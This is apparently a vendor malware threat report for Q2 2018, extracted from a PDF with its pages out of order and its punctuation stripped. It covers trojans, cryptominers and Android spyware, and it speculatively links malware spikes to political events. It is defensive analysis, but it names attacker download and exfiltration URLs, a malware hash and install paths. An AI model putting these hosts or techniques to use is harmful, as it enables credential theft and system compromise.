Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 2 of 73
5 MALWARE IN Q2 2018 THE BIG PICTURE 39
51 STRATEGIC THREAT COMPUTER WORMS 40 511 Generic Worms 41 512 Net Worms 42 513 Email Worms 43 514 p2p Worms 44 515 IM Worms 45
52 HIGH THREAT MALWARE 46 521 Backdoors 47 522 Viruses 48 523 Trojans 49 524 Exploits 50
53 MEDIUM THREAT MALWARE 51 531 Constructor 52 532 Packers 53 533 Email Flooder 54 534 Virtual Tools 55 535 Jokes 56
54 LOW THREAT MALWARE APPLICATIONS 57 541 Applications 58 542 Unwanted Applications 59 543 Unsafe Applications 60
6 VERTICAL ANALYSIS 61
7 GEOPOLITICAL INTELLIGENCE 63
71 USA 63 72 CHINA 64 73 SOUTH KOREA 65 74 NORTH KOREA 66 75 ARMENIA 67 76 BELARUS 68 77 IRAQ 69 78 UKRAINE 70 79 CROATIA 71 710 FINLAND RUSSIA USA 72
8 CONCLUSIONS 73
Global Threat Report Q2 2018 Edition
Page 3 of 73
1 Executive summary
11 Overview
bull In Q2 Comodo Cybersecurity detected approximately 400 million unique malware samples all over the world bull The malware was detected in 237 countriesrsquotop-level domains bull Russia Turkey and India were the countries with the highest number of worm infections bull The United Kingdom had the highest proportion of detected backdoors bull Ukraine and Russia were the most common countries of detection for viruses bull Germany was the 1 country hit by trojans
12 New Trends 121 Trojans jumped to the top of the malware list The most dangerous sign is the unfolding merger of trojans and phishing emails that amplifies the spreading of the malware Attackers use trojans to deliver other malware and the Trojans surge accompanies a significant increase in other malware infections As such users are facing a new challenge in the form of massive attacks implanting hidden malware with long-term activity
122 Cryptominers evolved into multifunctional malware Cryptomining decreased in quantity but grew in harmful capabilities As events in Q2 demonstrated this genre of malware is actively developing in two directions better hiding and stronger persistence Cryptominers have gained new features that let them fight antiviruses and deeply root in usersrsquo systems
123 Android malware skyrocketed in variety In Q2 the Comodo Threat Research Labs observed a huge spike in Android malware development Android devices have become attractive targets for cybercriminals because modern mobile device represents a treasure trove of data Spyware takes the lead in Android malware types Like real-world spies Android spyware constantly changes guises and methods of avoiding detection And its harmful potential goes up with every new version
124 Geopolitical intelligence Cyberattacks and malware spikes are often correlated with significant events in world politics Assignments of the US Secretary of State and CIA Director Armeniarsquos political revolution the Donald Trump and Vladimir Putin summit in Helsinki the Champions League final in Ukraine US - South Korean joint military exercises the anniversary of the 1989 Tiananmen Square protests and other events during Q2-2018 clearly demonstrate the existence of such correlations
Global Threat Report Q2 2018 Edition
Page 4 of 73
2 Trojans going on the offensive to hunt for confidential data The second quarter of 2018 brought a sudden change in malware competition Trojans squeezed out other malware types and jumped to the top of the charts Gaining the lionrsquos share of the malware marketplace they can radically influent on the cybersecurity landscape Their appearance makes cybersecurity departments and individual users update on their defense tactics
Malware Distribution by Type
Why are these changes inevitable
Trojans are a special kind of malware Their distinguishing feature is universality They are most effective at providing a diversity of attacks stealing data implanting ransomware adware cryptominers or even completely crashing systems
Another special feature of trojans is covert activity An owner of a trojan-infected machine can remain unaware of the attack for a long time during which the trojan is an active malefactor
Hence the need for a new approach to the defense tactic appears Letrsquos have a closer look at the most active vicious players of the trojans team to deeply understand what harm they can do to your computers if sneak inside
Global Threat Report Q2 2018 Edition
Page 5 of 73
Distribution of top 30 Malware Families
In this list of 30 top malware families where trojans overwhelmingly dominate you can find samples of this malware exhibiting diverse types of malicious activity
For example the leader of the attacks in Q2 TrojWareWin32Agent is a trojan family that clandestinely penetrates usersrsquo computers and then downloads other malware from a cybercriminal server And the downloaded malware can be of any type
Number two in the list TrojWareJSClickjack exhibits different activity it makes users unintentionally click on hidden links The link can be just another advertisement or lead to a malicious website to infect users with other types of malware
TrojWareJSFaceliker just clicks posts in Facebook on behalf of the user to promote fake or fraudulent pages The malware infects then usersrsquo browsers when they visit malicious or compromised websites Then when infected users open Facebook Faceliker hijacks their ldquolikesrdquo
TrojWareWin32Kryptik steals information from computers and sends it to the cybercriminal Command-and-Control server
Global Threat Report Q2 2018 Edition
Page 6 of 73
TrojWareWin32Injector uses process injection as the main technique to take malicious actions Its mostly used to bypass security products
TrojWareJSDownloader consists of scripts that download and execute malware from the Internet Itrsquos usually spread via a phishing email
Such diversity of malicious activity of trojans and their special ability to hide have always made them one of the hardest malware to fight But in Q2-2018 they become even more sophisticated and dangerous Comodo Cybersecurity Threat Research Labs observed especially alarming trends worthy of attention from the global cybersecurity community
First among the trends is an explosive mixture of trojans and phishing emails Earlier phishing emails mostly contained a link to a malicious website to lure victims to supply their credentials But today phishing emails have become a potent means of delivery for trojans and other malware These trojans steal credentials and private information by ferreting out infected machines in search of valuable data and then send it to cybercriminalsrsquo servers
The accompanying graph of the most popular malware spread via email Note that 18 of 20 are trojans
Distribution of Phishing Families of Malware
Global Threat Report Q2 2018 Edition
Page 7 of 73
21 The Most Widespread Trojan The most proliferated trojan TrojWareWin32Injector is designed to steal credentials from infected computers It was spread via fake email imitating a message from a shipping and trading company As seen in the screenshot the malware attached is carefully disguised with a plausible name and icon to look like a real scanned document
If a user takes the bait and runs the file it copies itself to appdata as D5E2DEE36C7Aexe then launches itself from that location and starts to gather credentials present in the system
It collects credentials and private data from known browsers email clients FTP clients WebDav SCP clients Then it sends all the collected data to the attackersrsquo server httpcallbedmlpackfarefrephp
The phishing email
Global Threat Report Q2 2018 Edition
Page 8 of 73
22 PowerShell-based attack with Emotet Another alarming trend is related to malware itself rather than its delivery method Often cybercriminals use malware based not on Windows native exe files but instead utilize PowerShell scripts and other legitimate software to infect a computer This type of attack is much harder to detect with antivirus tools
Emotet is one of the most aggressive trojans currently acting in cyberspace Spread by various infection vectors and backed by a huge network of compromised hosts it heavily affects many individuals and companies
The following attack started with the email that imitated a message from IRS about ldquoTax Account Transcriptrdquo Notice the message is written in a cheerful manner to inspire user trust
The phishing email
Global Threat Report Q2 2018 Edition
Page 9 of 73
The attached file is an Office document containing a VBScript As the settings of the newly installed Microsoft Office do not allow execution of such scripts by default the attackers added a special option to convince the victims to turn on VBScript execution
The special option to convince the victims to turn on VBScript execution
Global Threat Report Q2 2018 Edition
Page 10 of 73
The purpose of the VBScript is to launch PowerShell
Global Threat Report Q2 2018 Edition
Page 11 of 73
The malware downloads itself to a temporary folder and executes binaries located at hxxpwwwiyilikleralemicomGtXvlchxxpwwwthecyberconxioncomPUqUUe hxxpEliasWesselcomvu6xGmShxxpmossbeachmusicdeXuBBN6r hxxpairmaxxrswIdY
At the time of the writing only thecyberconxioncom host was serving a malware binary (SHA1 5974190561e707f63d776e55336841bd871eebdb)
The binary moves itself to CWindowsSysWOW64lanesviewerexe and creates a service ldquolanesviewerrdquo to ensure persistence
The malware creates ldquolanesviewerrdquo service to ensure persistence
Global Threat Report Q2 2018 Edition
Page 12 of 73
And after that Emotet begins it real mission ndash stealing private data from the compromised system which it then it sends to the cybercriminals Command amp Control server
The next example is even more cunning because it infects computers with popular legitimate Microsoft software
23 Flawed Ammyy RAT attack based on legitimate software Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks What is most impressive is that it is based on a legitimate software called Ammyy Admin Its history is a striking example of how malicious hackers turn legitimate tools into a tool of a thief
Ammyy Admin is Remote Desktop Software created by the Ammyy Group company It provides an easy way to establish a reliable remote desktop connection connecting remote computers within seconds without additional installation or configuration work
The dark side of this tool is that its features ideally suit the purposes of cybercriminal Unsurprisingly perpetrators tried to adopt it for their malicious activity Cybercriminals repeatedly compromised the Ammyyy Group website and replaced original Ammyy Admin software with a bundle containing malware Thus every user who downloaded Ammyy Admin became covertly infected Ammy Group cleaned up the compromised website but the attackers infected it again and this vicious сycle continued endlessly
Global Threat Report Q2 2018 Edition
Page 13 of 73
As you can see on the diagram Ammy Admin was used in spreading many types of nefarious malware
The newest version of malicious modification of Ammyy Admin is called Flawed Ammyy Itrsquos a remote access trojan (RAT) that appeared in the wild at the beginning of 2016 It got its name from the leaked source code of the third Ammyy Admin version Flawed Ammyy RAT let the attackers use functions such as Remote Desktop control File System Manager proxy support and audio chat Cybercriminals take total control of the infected host and can run amok ndash steal credentials and documents remove or add files run applications install other malware etc
The way Flaw Ammyy was spread in the second quarter deserves special attention because it used a new trick to infect users What is especially worth noticing is the fact that these tricks are also based on using a legitimate software ndash Microsoft this time
Global Threat Report Q2 2018 Edition
Page 14 of 73
Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment as in the following screenshot
The phishing email
IQY files are intended for making an Internet query from MS Excel so an IQY contains a URL and other related parameters It can download files and run them directly into MS Excel
The infected IQY included a malicious URL so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell
Malware runs PowerShell
Global Threat Report Q2 2018 Edition
Page 15 of 73
Thus in this case machines face extremely dangerous and potent malware created and delivered via legitimate software This feature makes it much harder for antivirus software to detect an attack
24 The growth of Flawed Ammyy attacks for Q2
The growth of Flawed Ammyy attacks for Q2
25 Ammyy Admin dissemination around the world for Q2 As illustrated trojans became an 800-pound gorilla in the malware market in Q2 This trend will inevitably entail a change of attack vectors to covert theft and manipulating users This trend is a real gift for cybercriminals and a terrible nightmare for users
Trojans let attackers gain time As malware acts covertly the cybercriminals have more than enough time to use stolen data to their advantage In many cases attacks can only be discovered too late after money is withdrawn from a bank account or confidential data published etc Merging trojans as payloads and phishing emails as means of delivery observed during Q2 will result in a huge surge in such attacks and victims And using legitimate tools like PowerShell for running malware will amplify the number of victims even more because such attacks are much harder to detect with antiviruses
To fight these attacks cybersecurity departments need to rearrange their approach to security measures per the new trends above Combining the best detection malware tools and methods of protecting data built on defense-in-depth principles provide the most promising solution
43188
46382
48881
40000
41000
42000
43000
44000
45000
46000
47000
48000
49000
50000
Apr May Jun
Global Threat Report Q2 2018 Edition
Page 16 of 73
3 Cryptominer Evolution
Going Fileless Killing Competitors Crashing Systems Cryptominers do not lead the Q2 malware pack but it does not mean that their impact is greatly diminished On the contrary current cryptominer behavior recalls that of an army preparing for battle training reprovisioning to fight more efficiently Cryptominers are quickly developing and gaining new dangerous abilities
Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers For that reason many users did not regard them as particularly dangerous at least not all cryptominers would steal information or destroy data like other malware merely sucking up CPU resources Moreover they typically do not employ strong obfuscation and can be easily discovered and deleted
But Q2 events clearly showed that the situation has radically changed
New samples of cryptominers detected by Comodo malware analysts exhibit much harmful abilities than those required for merely mining cryptocurrency These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals They are learning to hide and fight against antimalware tools They can camouflage themselves kill competing cryptominers and even crash user systems if met with an attempt to delete the malware
31 BadShell attacks enterprises Fileless malware is next-generation malware especially compared with traditional infection via exe files File-based malware resides on the hard drive making it easier to detect But fileless malware is different As its name suggests this type of malware represents malicious code injected into legitimate OS processes It need not be installed on a victim machine but functions only in memory making much harder for antiviruses to detect
Usually such malware is spread via malicious ad banners Clicking on a banner redirects a user to an infected website where the malware covertly installs itself into the victimrsquos computer As many antiviruses tools cannot detect it users remain unaware of being infected Not surprisingly its use by cybercriminals is on the increase
Last quarter Comodo Threat Research Labs analysts faced a scenario of just such an attack A company with several thousands of endpoints was compromised by fileless malware When their legacy security software failed to protect them the company looked to Comodo Threat Research Labs for assistance
Global Threat Report Q2 2018 Edition
Page 17 of 73
Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes PowerShell to execute commands Task Scheduler to ensure persistence and Registry to hold the malicious binary code In the screenshots below you see how exactly the malware dubbed BadShell works
If we decode the PowerShell arguments we see the malicious code in the registry The code is injected into an existing running process by the PowerShell script
BadShell at work
Global Threat Report Q2 2018 Edition
Page 18 of 73
The malicious code in the registry
Global Threat Report Q2 2018 Edition
Page 19 of 73
This emergency clearly demonstrates how dangerous cryptominer activity can be Just imagine it the entire compute capacity of the enterprises computers was engaged in mining cryptocurrency depriving employees of the ability to perform their jobs Comodo analysts took over the situation and cleaned the infection from all involved computers but of course the financial losses of the company were irreversible
Invulnerability to an antivirus and persistence in the system are the most important attributes for a cryptominer because the more it runs within the infected system the more it profits the attackers That is why cybercriminals give special attention to the cryptominers ability to elude antivirus software
Below is another cunning technique that turns an infected machine into a slave of the attacker
32 WinstarNssmMiner a system killer Like other cryptominers The WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals But it has a special feature ndash it can root into a system so deeply that it becomes unremovable Attempting to kill it will kill the target system totally
The secret of WinstarNssmMinerrsquos persistence lies in its method of infecting a victimrsquos computer It consists of two processes injected into two system svchostexe processes The first performs the main task ndash mining cryptocurrency The other runs in the background looking for antivirus products and disables them
The malicious code disguised as svhostexe
Especially impressive is that both infected svchostexe processed possess the system attribute ldquoCriticalProcess meaning that terminating any of them will crash the system leaving the user with a blue screen
WinstarNssmMiner spreading around the world
Global Threat Report Q2 2018 Edition
Page 20 of 73
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victimsrsquo system but their cryptomining competitors
33 CoinMiner kills rivals CoinMiner stands out against other cryptominers with a kill list feature that checks the infected machine for the presence of other cryptomalware If an ldquoalienrdquo cryptominer is detected the feature will terminate its processes
CoinMiner kills its rivals as follows
The code below downloads CoinMiner for Windows architecture (x86 or x64) and then checks if a miner is already running by testing the presence of an ldquoAMDDriver64rdquo process
Global Threat Report Q2 2018 Edition
Page 21 of 73
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists named $malwares and $malwares2 with the names of the processes that it is instructed to kill The lists include other types of cryptominers
In this way CoinMiner undividedly occupies the victims computer to use its resources for mining cryptocurrency
Global Threat Report Q2 2018 Edition
Page 22 of 73
Some cryptominers earned the spotlight of the mass-media and cybersecurity researchers easing user detection In Q2 these cryptominers learned to hide CoinHive is the brightest example of them
34 CoinHive changes its skin CoinHive is a popular JavaScript cryptominer If you put its string of code into your website page every visitor to the site will mine coins for you
As you can see the CoinHive script is easily detected
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports users have started checking websites codes for cryptominers But in the second quarter perpetrators found a way to overcome this obstacle Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners
Global Threat Report Q2 2018 Edition
Page 23 of 73
As a result the malicious code on a webpage looks like this
The obfuscated malicious code on a webpage
If we decode the string we encounter an iframe
The iframe loads the URL shortener
The iframe loads the URL shortener Notice the width and height of the iframe are set to 1 to make the iframe as invisible as possible
Now letrsquos see at the URL httpscnhvco
And there we can find the familiar link to CoinHive
The link to CoinHive
Global Threat Report Q2 2018 Edition
Page 24 of 73
What is the impact of this trick In a simple scenario a user visits a CoinHive-infected website Noticing notices that her computerrsquos CPU is overloaded she decides to check the webpage code but doesnrsquot find any signs of a cryptominer So she concludes that something went wrong with her PC while CoinHive coopts her computer to mine cryptocoins
The next malware in the raw prefers not mining cryptocurrency but steal it on-the-fly
35 Cryptocurrency clipboard hijacker intercepts transfers It would be more accurate to call this program cryptothief rather than cryptominer Because it does not devour an infected machinersquos resources but instead actually steals cryptocurrency redirecting it to the perpetrator
Cryptocurrency transfers require a wallet address The address is a long string combined with different characters and numbers so it is almost impossible to remember it or fill in manually That is why users usually copy-paste a wallet address to make a transaction Cybercriminals regard this copy-paste process a breach they can use to their advantage
Cryptocurrency clipboard hijacker checks the clipboard for a wallet address copy Upon finding one it changes it for the address of the wallet under the attackers control So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminalsrsquo hands
New Cryptocurrency Clipboard Hijacker sample can monitor 2343286 addresses
This malware is distributed in a bundle with the All-Radio 427 Portable software All-Radio 427 is a legitimate video and audio player created by Russian developers But cybercriminals copied the program and added the malicious code The malicious version of All-Radio 427 was used for spreading different types of malware clipboard cryptocurrency hijackers among them
Here is an example of a clipboard hijacker attack
A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm
Global Threat Report Q2 2018 Edition
Page 25 of 73
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity they seem to come back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors
Global Threat Report Q2 2018 Edition
Page 26 of 73
4 Android Devices Under Siege
41 Spying Stealing Mining Android devices are rapidly becoming high-value targets for cybercriminals and malware authors It is not surprising because today almost any smartphone is a treasure trove of information for perpetrators People increasingly use smartphones for financial operations but those are not the only jackpot for attackers Today every smartphone contains a plethora of confidential information about its owner
If the victim is a CEO politician or other VIP the content of the mobile device can be sold at the highest prices Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims Of course not only cybercriminals hunt for smartphone content Intelligence agencies and business competitors want to know everything about their targets Add jealous spouses tracking every move of their partners and parents wanting to control their children and you will easily understand why Android-oriented malware is a growing business
Today spying is the number one purpose of the Android malware In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them You can see the whole family of these digital spooks on the graph
The digital spooks
Global Threat Report Q2 2018 Edition
Page 27 of 73
Like real-world spies digital agents impersonate legitimate entities pretending to innocent applications or hiding malicious code inside legitimate software Like real spies they seek to remain invisible and constantly change disguises to avoid detection and hone their tradecraft from version to version
411 KevDroid The first is named KevDroid Itrsquos distributed in three versions
Version-1 Naver Defender
Version-2 Netease Defender
Version-3
PU
Disguises of KevDroid
The first version disguised as the Naver Defender application covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection This sample has multifunctional abilities for spying It steals account details contacts id name phone numbers and email address of the owner It grabs SMS messages and associated info It attempts to read call logs (number name type duration) emails (email type) and photos of the contacts After extracting all the data the malware encrypts it with ldquoAESrdquo algorithm and send to the attackersrsquo server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victimrsquos every phone call then encrypts and uploads it to the cybercriminalsrsquo server In addition it collects information about currently running services installed apps and the launcher name
The second version Netease Defender has additional spying abilities It takes control over the device camera and covertly records the victimrsquos activity Then it sends the video to the attackersrsquo server
Version-3 of KevDroid makes photos records call and creates a list of files on the device Also it extracts the web history account and contact details and the device information
People assume they are safe if they download apps exclusively from the official Google Play store This wrong assumption can be costly the first version of Desert Scorpion spyware was spread via official Google Play Services The spyware was camouflaged as a chat called Dardesh Instant App But when a user downloaded and ran it the app covertly connected to
Global Threat Report Q2 2018 Edition
Page 28 of 73
cybercriminalsrsquo Command and Control server and downloaded the spyware on the device From that moment the spyware constantly kept track of all events on the infected device Another means of the malware dissemination was social networks
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls audios and videos uninstalls other apps sends and receives messages and tracks the location of the smartphone It is included in some spyware tools like FinSpy and Pegasus Beyond the capabilities of the first version it collects information about installed applications extracts the metadata and makes changes on the victim device
Global Threat Report Q2 2018 Edition
Page 29 of 73
412 Zoo Park The next member of the spy family Zoo Park has 4 different versions
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app It extracts Accounts and Contacts details encodes them with Base64 and sends to the attackers server The second version has additional abilities extracting SMS details device information (including IMEI Network Operator Name SDK version OS version etc) Call Log details and External Storage content
The third version is included in spyware named ldquoSpymaster Prordquo and can
Enable and disable the GPS services
Record audio and send it to Command amp Control server
Upload image files
Collect information about the application installed
Collect browserrsquos data
